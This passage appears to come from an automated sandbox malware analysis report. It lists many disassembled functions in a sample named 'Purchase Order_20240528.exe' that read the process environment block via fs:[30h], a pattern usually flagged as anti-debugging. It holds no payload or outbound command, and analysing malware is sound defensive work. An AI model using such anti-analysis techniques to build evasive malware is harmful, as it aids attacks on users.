        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01620185 mov eax, dword ptr fs:[00000030h]3_2_01620185
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01684180 mov eax, dword ptr fs:[00000030h]3_2_01684180
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01684180 mov eax, dword ptr fs:[00000030h]3_2_01684180
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166019F mov eax, dword ptr fs:[00000030h]3_2_0166019F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166019F mov eax, dword ptr fs:[00000030h]3_2_0166019F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166019F mov eax, dword ptr fs:[00000030h]3_2_0166019F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166019F mov eax, dword ptr fs:[00000030h]3_2_0166019F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E2050 mov eax, dword ptr fs:[00000030h]3_2_015E2050
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160C073 mov eax, dword ptr fs:[00000030h]3_2_0160C073
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01666050 mov eax, dword ptr fs:[00000030h]3_2_01666050
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE016 mov eax, dword ptr fs:[00000030h]3_2_015FE016
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE016 mov eax, dword ptr fs:[00000030h]3_2_015FE016
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE016 mov eax, dword ptr fs:[00000030h]3_2_015FE016
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE016 mov eax, dword ptr fs:[00000030h]3_2_015FE016
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676030 mov eax, dword ptr fs:[00000030h]3_2_01676030
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01664000 mov ecx, dword ptr fs:[00000030h]3_2_01664000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01682000 mov eax, dword ptr fs:[00000030h]3_2_01682000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01682000 mov eax, dword ptr fs:[00000030h]3_2_01682000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01682000 mov eax, dword ptr fs:[00000030h]3_2_01682000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01682000 mov eax, dword ptr fs:[00000030h]3_2_01682000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01682000 mov eax, dword ptr fs:[00000030h]3_2_01682000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01682000 mov eax, dword ptr fs:[00000030h]3_2_01682000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01682000 mov eax, dword ptr fs:[00000030h]3_2_01682000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01682000 mov eax, dword ptr fs:[00000030h]3_2_01682000
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DA020 mov eax, dword ptr fs:[00000030h]3_2_015DA020
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DC020 mov eax, dword ptr fs:[00000030h]3_2_015DC020
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016660E0 mov eax, dword ptr fs:[00000030h]3_2_016660E0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016220F0 mov ecx, dword ptr fs:[00000030h]3_2_016220F0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DC0F0 mov eax, dword ptr fs:[00000030h]3_2_015DC0F0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E80E9 mov eax, dword ptr fs:[00000030h]3_2_015E80E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016620DE mov eax, dword ptr fs:[00000030h]3_2_016620DE
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DA0E3 mov ecx, dword ptr fs:[00000030h]3_2_015DA0E3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016780A8 mov eax, dword ptr fs:[00000030h]3_2_016780A8
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A60B8 mov eax, dword ptr fs:[00000030h]3_2_016A60B8
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A60B8 mov ecx, dword ptr fs:[00000030h]3_2_016A60B8
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E208A mov eax, dword ptr fs:[00000030h]3_2_015E208A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D80A0 mov eax, dword ptr fs:[00000030h]3_2_015D80A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168437C mov eax, dword ptr fs:[00000030h]3_2_0168437C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B634F mov eax, dword ptr fs:[00000030h]3_2_016B634F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01662349 mov eax, dword ptr fs:[00000030h]3_2_01662349
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AA352 mov eax, dword ptr fs:[00000030h]3_2_016AA352
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01688350 mov ecx, dword ptr fs:[00000030h]3_2_01688350
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166035C mov eax, dword ptr fs:[00000030h]3_2_0166035C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166035C mov eax, dword ptr fs:[00000030h]3_2_0166035C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166035C mov eax, dword ptr fs:[00000030h]3_2_0166035C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166035C mov ecx, dword ptr fs:[00000030h]3_2_0166035C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166035C mov eax, dword ptr fs:[00000030h]3_2_0166035C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166035C mov eax, dword ptr fs:[00000030h]3_2_0166035C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DC310 mov ecx, dword ptr fs:[00000030h]3_2_015DC310
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B8324 mov eax, dword ptr fs:[00000030h]3_2_016B8324
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B8324 mov ecx, dword ptr fs:[00000030h]3_2_016B8324
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B8324 mov eax, dword ptr fs:[00000030h]3_2_016B8324
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B8324 mov eax, dword ptr fs:[00000030h]3_2_016B8324
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A30B mov eax, dword ptr fs:[00000030h]3_2_0161A30B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A30B mov eax, dword ptr fs:[00000030h]3_2_0161A30B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A30B mov eax, dword ptr fs:[00000030h]3_2_0161A30B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01600310 mov ecx, dword ptr fs:[00000030h]3_2_01600310
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E83C0 mov eax, dword ptr fs:[00000030h]3_2_015E83C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E83C0 mov eax, dword ptr fs:[00000030h]3_2_015E83C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E83C0 mov eax, dword ptr fs:[00000030h]3_2_015E83C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E83C0 mov eax, dword ptr fs:[00000030h]3_2_015E83C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA3C0 mov eax, dword ptr fs:[00000030h]3_2_015EA3C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA3C0 mov eax, dword ptr fs:[00000030h]3_2_015EA3C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA3C0 mov eax, dword ptr fs:[00000030h]3_2_015EA3C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA3C0 mov eax, dword ptr fs:[00000030h]3_2_015EA3C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA3C0 mov eax, dword ptr fs:[00000030h]3_2_015EA3C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA3C0 mov eax, dword ptr fs:[00000030h]3_2_015EA3C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016163FF mov eax, dword ptr fs:[00000030h]3_2_016163FF
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169C3CD mov eax, dword ptr fs:[00000030h]3_2_0169C3CD
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016663C0 mov eax, dword ptr fs:[00000030h]3_2_016663C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE3F0 mov eax, dword ptr fs:[00000030h]3_2_015FE3F0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE3F0 mov eax, dword ptr fs:[00000030h]3_2_015FE3F0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015FE3F0 mov eax, dword ptr fs:[00000030h]3_2_015FE3F0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E3DB mov eax, dword ptr fs:[00000030h]3_2_0168E3DB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E3DB mov eax, dword ptr fs:[00000030h]3_2_0168E3DB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E3DB mov ecx, dword ptr fs:[00000030h]3_2_0168E3DB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168E3DB mov eax, dword ptr fs:[00000030h]3_2_0168E3DB
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F03E9 mov eax, dword ptr fs:[00000030h]3_2_015F03E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F03E9 mov eax, dword ptr fs:[00000030h]3_2_015F03E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F03E9 mov eax, dword ptr fs:[00000030h]3_2_015F03E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F03E9 mov eax, dword ptr fs:[00000030h]3_2_015F03E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F03E9 mov eax, dword ptr fs:[00000030h]3_2_015F03E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F03E9 mov eax, dword ptr fs:[00000030h]3_2_015F03E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F03E9 mov eax, dword ptr fs:[00000030h]3_2_015F03E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F03E9 mov eax, dword ptr fs:[00000030h]3_2_015F03E9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016843D4 mov eax, dword ptr fs:[00000030h]3_2_016843D4
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016843D4 mov eax, dword ptr fs:[00000030h]3_2_016843D4
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D8397 mov eax, dword ptr fs:[00000030h]3_2_015D8397
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D8397 mov eax, dword ptr fs:[00000030h]3_2_015D8397
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D8397 mov eax, dword ptr fs:[00000030h]3_2_015D8397
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DE388 mov eax, dword ptr fs:[00000030h]3_2_015DE388
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DE388 mov eax, dword ptr fs:[00000030h]3_2_015DE388
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DE388 mov eax, dword ptr fs:[00000030h]3_2_015DE388
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160438F mov eax, dword ptr fs:[00000030h]3_2_0160438F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160438F mov eax, dword ptr fs:[00000030h]3_2_0160438F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E6259 mov eax, dword ptr fs:[00000030h]3_2_015E6259
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DA250 mov eax, dword ptr fs:[00000030h]3_2_015DA250
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01690274 mov eax, dword ptr fs:[00000030h]3_2_01690274
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01668243 mov eax, dword ptr fs:[00000030h]3_2_01668243
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01668243 mov ecx, dword ptr fs:[00000030h]3_2_01668243
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D826B mov eax, dword ptr fs:[00000030h]3_2_015D826B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B625D mov eax, dword ptr fs:[00000030h]3_2_016B625D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169A250 mov eax, dword ptr fs:[00000030h]3_2_0169A250
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169A250 mov eax, dword ptr fs:[00000030h]3_2_0169A250
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4260 mov eax, dword ptr fs:[00000030h]3_2_015E4260
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4260 mov eax, dword ptr fs:[00000030h]3_2_015E4260
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4260 mov eax, dword ptr fs:[00000030h]3_2_015E4260
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D823B mov eax, dword ptr fs:[00000030h]3_2_015D823B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA2C3 mov eax, dword ptr fs:[00000030h]3_2_015EA2C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA2C3 mov eax, dword ptr fs:[00000030h]3_2_015EA2C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA2C3 mov eax, dword ptr fs:[00000030h]3_2_015EA2C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA2C3 mov eax, dword ptr fs:[00000030h]3_2_015EA2C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA2C3 mov eax, dword ptr fs:[00000030h]3_2_015EA2C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B62D6 mov eax, dword ptr fs:[00000030h]3_2_016B62D6
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F02E1 mov eax, dword ptr fs:[00000030h]3_2_015F02E1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F02E1 mov eax, dword ptr fs:[00000030h]3_2_015F02E1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F02E1 mov eax, dword ptr fs:[00000030h]3_2_015F02E1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016762A0 mov eax, dword ptr fs:[00000030h]3_2_016762A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016762A0 mov ecx, dword ptr fs:[00000030h]3_2_016762A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016762A0 mov eax, dword ptr fs:[00000030h]3_2_016762A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016762A0 mov eax, dword ptr fs:[00000030h]3_2_016762A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016762A0 mov eax, dword ptr fs:[00000030h]3_2_016762A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016762A0 mov eax, dword ptr fs:[00000030h]3_2_016762A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01660283 mov eax, dword ptr fs:[00000030h]3_2_01660283
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01660283 mov eax, dword ptr fs:[00000030h]3_2_01660283
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01660283 mov eax, dword ptr fs:[00000030h]3_2_01660283
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E284 mov eax, dword ptr fs:[00000030h]3_2_0161E284
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E284 mov eax, dword ptr fs:[00000030h]3_2_0161E284
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F02A0 mov eax, dword ptr fs:[00000030h]3_2_015F02A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F02A0 mov eax, dword ptr fs:[00000030h]3_2_015F02A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161656A mov eax, dword ptr fs:[00000030h]3_2_0161656A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161656A mov eax, dword ptr fs:[00000030h]3_2_0161656A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161656A mov eax, dword ptr fs:[00000030h]3_2_0161656A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E8550 mov eax, dword ptr fs:[00000030h]3_2_015E8550
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E8550 mov eax, dword ptr fs:[00000030h]3_2_015E8550
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E53E mov eax, dword ptr fs:[00000030h]3_2_0160E53E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E53E mov eax, dword ptr fs:[00000030h]3_2_0160E53E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E53E mov eax, dword ptr fs:[00000030h]3_2_0160E53E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E53E mov eax, dword ptr fs:[00000030h]3_2_0160E53E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E53E mov eax, dword ptr fs:[00000030h]3_2_0160E53E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676500 mov eax, dword ptr fs:[00000030h]3_2_01676500
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0535 mov eax, dword ptr fs:[00000030h]3_2_015F0535
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0535 mov eax, dword ptr fs:[00000030h]3_2_015F0535
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0535 mov eax, dword ptr fs:[00000030h]3_2_015F0535
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0535 mov eax, dword ptr fs:[00000030h]3_2_015F0535
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0535 mov eax, dword ptr fs:[00000030h]3_2_015F0535
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F0535 mov eax, dword ptr fs:[00000030h]3_2_015F0535
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4500 mov eax, dword ptr fs:[00000030h]3_2_016B4500
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4500 mov eax, dword ptr fs:[00000030h]3_2_016B4500
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4500 mov eax, dword ptr fs:[00000030h]3_2_016B4500
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4500 mov eax, dword ptr fs:[00000030h]3_2_016B4500
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4500 mov eax, dword ptr fs:[00000030h]3_2_016B4500
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4500 mov eax, dword ptr fs:[00000030h]3_2_016B4500
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4500 mov eax, dword ptr fs:[00000030h]3_2_016B4500
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E5E7 mov eax, dword ptr fs:[00000030h]3_2_0160E5E7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E5E7 mov eax, dword ptr fs:[00000030h]3_2_0160E5E7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E5E7 mov eax, dword ptr fs:[00000030h]3_2_0160E5E7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E5E7 mov eax, dword ptr fs:[00000030h]3_2_0160E5E7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E5E7 mov eax, dword ptr fs:[00000030h]3_2_0160E5E7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E5E7 mov eax, dword ptr fs:[00000030h]3_2_0160E5E7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E5E7 mov eax, dword ptr fs:[00000030h]3_2_0160E5E7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E5E7 mov eax, dword ptr fs:[00000030h]3_2_0160E5E7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C5ED mov eax, dword ptr fs:[00000030h]3_2_0161C5ED
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C5ED mov eax, dword ptr fs:[00000030h]3_2_0161C5ED
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E65D0 mov eax, dword ptr fs:[00000030h]3_2_015E65D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E5CF mov eax, dword ptr fs:[00000030h]3_2_0161E5CF
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E5CF mov eax, dword ptr fs:[00000030h]3_2_0161E5CF
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A5D0 mov eax, dword ptr fs:[00000030h]3_2_0161A5D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A5D0 mov eax, dword ptr fs:[00000030h]3_2_0161A5D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E25E0 mov eax, dword ptr fs:[00000030h]3_2_015E25E0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016605A7 mov eax, dword ptr fs:[00000030h]3_2_016605A7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016605A7 mov eax, dword ptr fs:[00000030h]3_2_016605A7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016605A7 mov eax, dword ptr fs:[00000030h]3_2_016605A7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016045B1 mov eax, dword ptr fs:[00000030h]3_2_016045B1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016045B1 mov eax, dword ptr fs:[00000030h]3_2_016045B1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E2582 mov eax, dword ptr fs:[00000030h]3_2_015E2582
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E2582 mov ecx, dword ptr fs:[00000030h]3_2_015E2582
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01614588 mov eax, dword ptr fs:[00000030h]3_2_01614588
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161E59C mov eax, dword ptr fs:[00000030h]3_2_0161E59C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D645D mov eax, dword ptr fs:[00000030h]3_2_015D645D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C460 mov ecx, dword ptr fs:[00000030h]3_2_0166C460
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160A470 mov eax, dword ptr fs:[00000030h]3_2_0160A470
